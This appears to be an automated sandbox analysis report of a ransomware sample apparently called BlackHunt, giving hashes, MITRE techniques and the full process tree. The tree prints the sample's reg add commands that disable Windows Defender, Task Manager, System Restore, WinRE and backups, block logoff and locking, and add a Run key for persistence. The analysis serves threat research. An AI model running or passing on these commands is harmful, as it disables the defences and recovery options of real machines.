ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee

Analysis

max time kernel
211s
max time network
201s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
19-01-2024 00:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe
Size

707KB
MD5

8c0b6e4647e4efbbd4e6fdce74ad2392
SHA1

022e01980b0eb0de51cca2ec1b61561deb0247a1
SHA256

ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee
SHA512

89ad0d92867d32b85256498c7c6d0278a65d19b909a750a8aed29ea019bb1bff2e11b54b4fc6817290a5a0c1df41c4e83e5fc693e6c5c44dceb2c3261a871752
SSDEEP

6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza148ovnh:6uaTmkZJ+naie5OTamgEoKxLWTWh

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta"	reg.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
31	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 8 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.Hunt2	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Hunt2	reg.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe
Token: SeRestorePrivilege	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe
Token: SeBackupPrivilege	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe
Token: SeTakeOwnershipPrivilege	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe
Token: SeAuditPrivilege	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe
Token: SeSecurityPrivilege	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe
Token: SeIncBasePriorityPrivilege	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 452 wrote to memory of 4488	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	89
PID 452 wrote to memory of 4488	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	89
PID 452 wrote to memory of 828	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	91
PID 452 wrote to memory of 828	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	91
PID 452 wrote to memory of 3476	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	93
PID 452 wrote to memory of 3476	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	93
PID 452 wrote to memory of 1792	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	96
PID 452 wrote to memory of 1792	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	96
PID 4488 wrote to memory of 3264	4488	cmd.exe	95
PID 4488 wrote to memory of 3264	4488	cmd.exe	95
PID 452 wrote to memory of 4916	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	98
PID 452 wrote to memory of 4916	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	98
PID 828 wrote to memory of 904	828	cmd.exe	99
PID 828 wrote to memory of 904	828	cmd.exe	99
PID 3476 wrote to memory of 2112	3476	cmd.exe	101
PID 3476 wrote to memory of 2112	3476	cmd.exe	101
PID 4916 wrote to memory of 1240	4916	cmd.exe	102
PID 4916 wrote to memory of 1240	4916	cmd.exe	102
PID 1792 wrote to memory of 1044	1792	cmd.exe	103
PID 1792 wrote to memory of 1044	1792	cmd.exe	103
PID 452 wrote to memory of 4652	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	105
PID 452 wrote to memory of 4652	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	105
PID 452 wrote to memory of 1104	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	107
PID 452 wrote to memory of 1104	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	107
PID 452 wrote to memory of 1036	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	109
PID 452 wrote to memory of 1036	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	109
PID 452 wrote to memory of 4892	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	111
PID 452 wrote to memory of 4892	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	111
PID 452 wrote to memory of 4436	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	117
PID 452 wrote to memory of 4436	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	117
PID 452 wrote to memory of 3236	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	114
PID 452 wrote to memory of 3236	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	114
PID 4652 wrote to memory of 5104	4652	cmd.exe	115
PID 4652 wrote to memory of 5104	4652	cmd.exe	115
PID 1104 wrote to memory of 4204	1104	cmd.exe	118
PID 1104 wrote to memory of 4204	1104	cmd.exe	118
PID 452 wrote to memory of 3020	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	120
PID 452 wrote to memory of 3020	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	120
PID 1036 wrote to memory of 1412	1036	cmd.exe	119
PID 1036 wrote to memory of 1412	1036	cmd.exe	119
PID 452 wrote to memory of 3620	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	122
PID 452 wrote to memory of 3620	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	122
PID 452 wrote to memory of 1744	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	124
PID 452 wrote to memory of 1744	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	124
PID 452 wrote to memory of 560	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	127
PID 452 wrote to memory of 560	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	127
PID 452 wrote to memory of 3852	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	125
PID 452 wrote to memory of 3852	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	125
PID 4892 wrote to memory of 1424	4892	cmd.exe	129
PID 4892 wrote to memory of 1424	4892	cmd.exe	129
PID 452 wrote to memory of 4040	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	131
PID 452 wrote to memory of 4040	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	131
PID 452 wrote to memory of 3708	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	137
PID 452 wrote to memory of 3708	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	137
PID 3236 wrote to memory of 3908	3236	cmd.exe	135
PID 3236 wrote to memory of 3908	3236	cmd.exe	135
PID 4436 wrote to memory of 2928	4436	cmd.exe	134
PID 4436 wrote to memory of 2928	4436	cmd.exe	134
PID 452 wrote to memory of 2568	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	136
PID 452 wrote to memory of 2568	452	ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe	136
PID 3020 wrote to memory of 3284	3020	cmd.exe	139
PID 3020 wrote to memory of 3284	3020	cmd.exe	139
PID 3620 wrote to memory of 712	3620	cmd.exe	140
PID 3620 wrote to memory of 712	3620	cmd.exe	140

C:\Users\Admin\AppData\Local\Temp\ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe
"C:\Users\Admin\AppData\Local\Temp\ac689a3cf0e69fd5376b49b19c337d3333931b187455458f81dcb49be63a42ee.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:452
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4488
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
    3⤵
    - Modifies registry class
    PID:3264
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:828
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    3⤵
    - Modifies registry class
    PID:904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3476
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
    3⤵
    - Modifies registry class
    PID:2112
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1792
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
    3⤵
    - Modifies registry class
    PID:1044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4916
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    3⤵
    - Adds Run key to start application
    PID:1240
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4652
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:5104
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1104
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1036
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    3⤵
    PID:1412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4892
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    3⤵
    PID:1424
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3236
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    3⤵
    PID:3908
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4436
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    3⤵
    PID:2928
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3020
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    3⤵
    PID:3284
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3620
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    3⤵
    PID:712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  2⤵
  PID:1744
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    3⤵
    PID:3696
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  2⤵
  PID:3852
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    3⤵
    PID:3956
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  2⤵
  PID:560
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    3⤵
    PID:1944
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
  2⤵
  PID:4040
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    3⤵
    PID:3324
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
  2⤵
  PID:2568
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    3⤵
    PID:3008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  2⤵
  PID:3708
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    3⤵
    PID:2540
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  2⤵
  PID:4684
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    3⤵
    PID:4092
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
  2⤵
  PID:3488
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
    3⤵
    PID:3984
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
  2⤵
  PID:4104
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
    3⤵
    PID:640
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
  2⤵
  PID:3408
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
    3⤵
    PID:4268
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
  2⤵
  PID:4832
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
    3⤵
    PID:4800
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
  2⤵
  PID:2324
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
    3⤵
    PID:2980
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
  2⤵
  PID:4484
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
    3⤵
    PID:792
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  2⤵
  PID:4380
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
    3⤵
    PID:2904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
  2⤵
  PID:384
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
    3⤵
    PID:3572
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
  2⤵
  PID:3304
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
    3⤵
    PID:2956